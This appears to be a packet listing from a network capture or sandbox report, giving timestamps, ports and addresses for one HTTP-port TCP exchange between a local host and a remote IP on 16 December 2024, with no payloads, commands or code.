Dec 16, 2024 11:03:19.022906065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.022960901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.023026943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.023083925 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.024126053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.024178982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.024219036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.024270058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.025250912 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.025300980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.025366068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.025414944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.026345015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.026397943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.026451111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.027504921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.027559042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.027625084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.027678967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.028639078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.028687954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.160422087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.160571098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.160644054 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.160964012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.161062002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.161122084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.162041903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.162094116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.162127972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.162190914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.163192987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.163244963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.163304090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.163357973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.164336920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.164385080 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.164478064 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.164525986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.165617943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.165746927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.165800095 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.166687012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.166739941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.166762114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.166821957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.167809010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.167857885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.167903900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.167948961 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.168973923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.169142008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.169194937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.170093060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.170145035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.170212030 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.170272112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.171245098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.171353102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.171371937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.171430111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.172394991 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.172446012 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.172518015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.172564030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.173563004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.173691034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.173744917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.174825907 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.174876928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.175041914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.175092936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.175971985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.176023006 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.176219940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.176269054 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.177031040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.177082062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.177151918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.177202940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.178302050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.178464890 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.178518057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.179372072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.179419041 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.179486036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.179543018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.180500031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.180550098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.180613041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.180656910 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.181668997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.181771040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.181823969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.182760000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.182811975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.182816029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.182873011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.183971882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.184026957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.184108973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.184159040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.185112000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.185163021 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.185244083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.185292006 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.186270952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.186402082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.186451912 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.187424898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.187486887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.187555075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.187607050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.188605070 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.188654900 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.188735008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.188790083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.189770937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.189896107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.189964056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.190907955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.190962076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.191029072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.191071987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.192069054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.192111969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.192190886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.192240953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.193192959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.193329096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.193383932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.194348097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.194401979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.194475889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.194531918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.195513010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.195560932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.195626020 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.195677042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.196681976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.196732998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.196801901 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.196846962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.197828054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.198054075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.198108912 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.199002028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.199054956 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.199112892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.199160099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.200151920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.200202942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.200285912 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.200334072 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.201283932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.201335907 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.201416969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.201463938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.202450037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.202552080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.202610970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.203617096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.203669071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.203752995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.203804970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.204742908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.204792023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.204952955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.205931902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.205985069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.206022978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.206069946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.207093954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.207146883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.207175970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.207226038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.208233118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.208302975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.208369017 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.208416939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.209352970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.209521055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.209573984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.210510015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.210560083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.210642099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.210688114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.211689949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.211744070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.211812019 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.211860895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.212863922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.212963104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.212965012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.213017941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.214044094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.214165926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.214219093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.215207100 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.215256929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.215341091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.215392113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.216321945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.216361046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.216372967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.216409922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.217596054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.217633963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.217644930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.217678070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.218792915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.218909025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.218969107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.219882011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.219960928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.220005989 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.220061064 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.220877886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.220938921 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.352255106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.352325916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.352406025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.352766991 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.352824926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.352884054 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.353708029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.353820086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.353823900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.353867054 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.354859114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.354911089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.354978085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.355027914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.356028080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.356080055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.356162071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.356211901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.357156992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.357328892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.357378960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.358381987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.358437061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.358496904 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.358551979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.359461069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.359513998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.359579086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.359628916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.360671997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.360726118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.360791922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.361778975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.361834049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.361882925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.361932993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.362960100 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.363009930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.363081932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.363131046 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.364223003 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.364322901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.364327908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.364373922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.365272045 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.365326881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.365384102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.365433931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.366736889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.366790056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.366857052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.366906881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.367614031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.367664099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.367744923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.367796898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.368727922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.368776083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.368841887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.369915962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.369966984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.370050907 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.370101929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.371057034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.371108055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.371157885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.371206999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.372215033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.372265100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.372271061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.372320890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.373347044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.373445988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.373495102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.374473095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.374526978 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.374603987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.374655008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.375670910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.375725985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.375776052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.375827074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.376847029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.376902103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.376969099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.377019882 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.377994061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.378042936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.378499985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.378550053 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.379147053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.379196882 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.379264116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.379311085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.380321980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.380366087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.380403996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.380454063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.381418943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.381578922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.381649017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.382610083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.382674932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.382731915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.382781982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.383979082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.384032965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.384093046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.384144068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.385062933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.385099888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.385154009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.386049986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.386104107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.386183023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.386236906 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.387208939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.387260914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.387408972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.387459040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.388389111 CET	80	49800	31.41.244.11	192.168.2.5
